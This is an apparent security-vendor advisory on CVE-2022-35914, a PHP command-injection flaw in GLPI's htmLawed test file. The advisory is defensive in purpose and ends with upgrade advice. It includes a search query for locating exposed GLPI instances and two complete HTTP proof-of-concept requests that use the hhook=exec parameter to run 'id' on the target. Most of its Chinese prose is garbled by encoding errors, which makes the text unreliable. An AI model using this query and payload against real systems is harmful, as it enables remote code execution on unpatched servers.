• Ìá½»ÐèÇó
    *
    *

    *
    *
    *
    Á¢¼´Ìá½»
    µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

    logo

      ²úÆ·Óë·þÎñ
      ½â¾ö·½°¸
      ¼¼ÊõÖ§³Ö
      ºÏ×÷·¢Õ¹
      ¹ØÓڻƽð³Ç

      ÉêÇëÊÔÓÃ
        CVE-2022-35914£ºGLPI ×¢Èë©¶´¼òÎö
        ·¢²¼Ê±¼ä£º2023-02-10 ÔĶÁ´ÎÊý£º 1017 ´Î
        ©¶´¸ÅÊö

        GLPIÊǸöÈË¿ª·¢ÕßµÄÒ»¿î¿ªÔ´ITºÍ×ʲú¹ÜÀíÈí¼þ¡£¸ÃÈí¼þÌṩ¹¦ÄÜÈ«ÃæµÄIT×ÊÔ´¹ÜÀí½Ó¿Ú£¬¿ÉÒÔÓÃËüÀ´½¨Á¢Êý¾Ý¿âÈ«Ãæ¹ÜÀíITµÄµçÄÔ£¬ÏÔʾÆ÷£¬·þÎñÆ÷£¬´òÓ¡»ú£¬ÍøÂçÉ豸£¬µç»°£¬ÉõÖÁÎø¹ÄºÍÄ«ºÐµÈ¡£

        GLPI 10.0.2¼°Ö®Ç°°æ±¾´æÔڻƽð³Ç¹ÙÍøÂ©¶´£¬¸Ã©¶´Ô´ÓÚhtmlawed Ä£¿éÖеĠ/vendor/htmlawed/htmlawed/htmLawedTest.php ÔÊÐí PHP ´úÂë×¢È롣©¶´±àºÅ£ºCVE-2022-35914£¬Â©¶´µÈ¼¶£º¸ßΣ¡£

        Ó°Ïì°æ±¾

        GLPI 10.0.2¼°Ö®Ç°°æ±¾

        ©¶´¸´ÏÖ

        fofaËÑË÷Óï·¨£º


        title="GLPI - µÇ½Èë¿Ú"

        ͼƬ

        ʹÓÃBurpsuite¹¤¾ß×¥°ü£¬Ö´ÐÐÈçÏÂPOC»ñÈ¡tokenºÍsidµÄÖµ¡£



        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=d531j7fek8t6v3d0d0jpk558q5Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
        token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=£å£ø£å£ã&sid=d531j7fek8t6v3d0d0jpk558q5
        ͼƬ
        ͼƬ

        ½«sidÔÚcookieÍ·ºÍPOSTÊý¾Ý°ütoken²ÎÊýÖÐÌæ»»£¬½«tokenÔÚPOSTÊý¾Ý°ütoken²ÎÊýÖÐÌæ»»£¬£å£ø£å£ãÖ´ÐÐidÃüÁµÃµ½»ØÏÔ¡£




        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=53lec8gbd0dvh64k0ikst1d0riUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
        token=94dd0c78fff81fb34a491754631e8ee7&text=id&hhook=£å£ø£å£ã&sid=53lec8gbd0dvh64k0ikst1d0ri

        ͼƬ

        ´¦Öý¨Òé

        ¸ù¾Ý¹Ù·½ÎĵµÉý¼¶ÖÁ×îа汾¡£


        Ãâ·ÑÊÔÓÃ
        ·þÎñÈÈÏß

        ÂíÉÏ×Éѯ

        400-811-3777

        »Øµ½¶¥²¿
          ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿